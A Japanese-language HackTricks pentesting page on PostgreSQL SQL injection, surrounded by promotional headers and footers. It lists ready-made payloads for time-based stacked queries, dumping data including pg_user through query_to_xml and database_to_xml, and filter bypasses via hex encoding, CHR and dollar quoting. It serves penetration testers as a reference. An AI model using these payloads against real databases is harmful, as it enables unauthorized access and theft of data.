hacktricks/pentesting-web/sql-injection/postgresql-injection

PostgreSQLインジェクション

htARTE（HackTricks AWS Red Team Expert） でAWSハッキングをゼロからヒーローまで学ぶ！

HackTricksをサポートする他の方法：

• HackTricksで企業を宣伝したいまたはHackTricksをPDFでダウンロードしたい場合は、SUBSCRIPTION PLANSをチェックしてください！
• 公式PEASS＆HackTricksスワッグを入手する
• The PEASS Familyを発見し、独占的なNFTsのコレクションを見る
• 💬 Discordグループまたはtelegramグループに参加するか、Twitter 🐦 @carlospolopmをフォローしてください。
• HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出して、あなたのハッキングテクニックを共有してください。

バグバウンティのヒント: Intigritiにサインアップして、ハッカーによって作成されたプレミアムバグバウンティプラットフォームを利用しましょう！今すぐhttps://go.intigriti.com/hacktricksに参加して、最大**$100,000**のバウンティを獲得し始めましょう！

{% embed url="https://go.intigriti.com/hacktricks" %}

---

このページは、postgresqlデータベースで見つかったSQLインジェクションを悪用するための異なるトリックを説明し、 https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md で見つけることができるトリックを補完することを目的としています。

ネットワークインタラクション - 特権昇格、ポートスキャナー、NTLMチャレンジレスポンスの開示＆エクスフィルトレーション

**PostgreSQLモジュール dblink**は、他のPostgreSQLインスタンスに接続してTCP接続を実行する機能を提供します。これらの機能は、COPY FROM機能と組み合わせることで、特権昇格、ポートスキャン、NTLMチャレンジレスポンスの取得などのアクションを可能にします。これらの攻撃を実行する詳細な方法については、これらの攻撃を実行する方法をチェックしてください。

dblinkと大規模オブジェクトを使用したエクスフィルトレーションの例

CTFの例を見るために、この例を参照してください。これは、大規模オブジェクト内にデータをロードし、その後dblink_connect関数のユーザー名内の大規模オブジェクトの内容をエクスフィルトする方法の例です。

PostgreSQL攻撃：読み書き、RCE、特権昇格

PostgreSQLからホストを侵害し、特権を昇格させる方法については、次をチェックしてください：

{% content-ref url="../../../network-services-pentesting/pentesting-postgresql.md" %} pentesting-postgresql.md {% endcontent-ref %}

WAFバイパス

PostgreSQL文字列関数

文字列の操作は、WAFをバイパスしたり他の制限を回避するのに役立つ場合があります。
このページ では、いくつかの有用な文字列関数を見つけることができます。

スタックされたクエリ

PostgreSQLはスタックされたクエリをサポートしていますが、1つのレスポンスが期待されているときに2つのレスポンスが返されると、いくつかのアプリケーションはエラーをスローする可能性があります。しかし、タイムインジェクションを介してスタックされたクエリを悪用することはできます。

id=1; select pg_sleep(10);-- -
1; SELECT case when (SELECT current_setting('is_superuser'))='on' then pg_sleep(10) end;-- -

XMLトリック

query_to_xml

この関数は、1つのファイルでXML形式のすべてのデータを返します。1行に大量のデータをダンプしたい場合に最適です。

SELECT query_to_xml('select * from pg_user',true,true,'');

database_to_xml

この関数は、データベース全体をXML形式で1行にダンプします（データベースが非常に大きい場合は、DoS攻撃を引き起こす可能性があるため注意してください）。

SELECT database_to_xml(true,true,'');

ヘックス形式の文字列

クエリを文字列内で実行できる場合（たとえば、query_to_xml 関数を使用する場合）、convert_from を使用して文字列をヘックス形式で渡すことができ、この方法でフィルタをバイパスできます。

select encode('select cast(string_agg(table_name, '','') as int) from information_schema.tables', 'hex'), convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573', 'UTF8');

# Bypass via stacked queries + error based + query_to_xml with hex
;select query_to_xml(convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573','UTF8'),true,true,'')-- -h

# Bypass via boolean + error based + query_to_xml with hex
1 or '1' = (query_to_xml(convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573','UTF8'),true,true,''))::text-- -

{% endcode %}

禁止された引用符

引用符を使用できない場合は、基本的な句をCHRでバイパスすることができます（文字連結はSELECT、INSERT、DELETEなどの基本的なクエリにのみ適用されます。すべてのSQLステートメントには適用されません）:

SELECT CHR(65) || CHR(87) || CHR(65) || CHR(69);

または、$を使用しても同じ結果が返されます：

SELECT 'hacktricks';
SELECT $$hacktricks$$;
SELECT $TAG$hacktricks$TAG$;

バグバウンティのヒント: Intigriti にサインアップして、ハッカーたちによって作成されたプレミアムバグバウンティプラットフォームに参加しましょう！https://go.intigriti.com/hacktricks で今すぐ登録して、最大**$100,000**のバウンティを獲得しましょう！

{% embed url="https://go.intigriti.com/hacktricks" %}

htARTE（HackTricks AWS Red Team Expert）で**ゼロからヒーローまでのAWSハッキングを学びましょう**！

HackTricksをサポートする他の方法:

• HackTricksで企業を宣伝したい、またはHackTricksをPDFでダウンロードしたい場合は、SUBSCRIPTION PLANSをチェックしてください！
• 公式PEASS＆HackTricksのグッズを入手する
• The PEASS Familyを発見し、独占的なNFTsのコレクションを見つける
• 💬 Discordグループ に参加するか、telegramグループに参加するか、Twitter 🐦 @carlospolopmをフォローする
• HackTricksとHackTricks CloudのgithubリポジトリにPRを提出して、あなたのハッキングトリックを共有する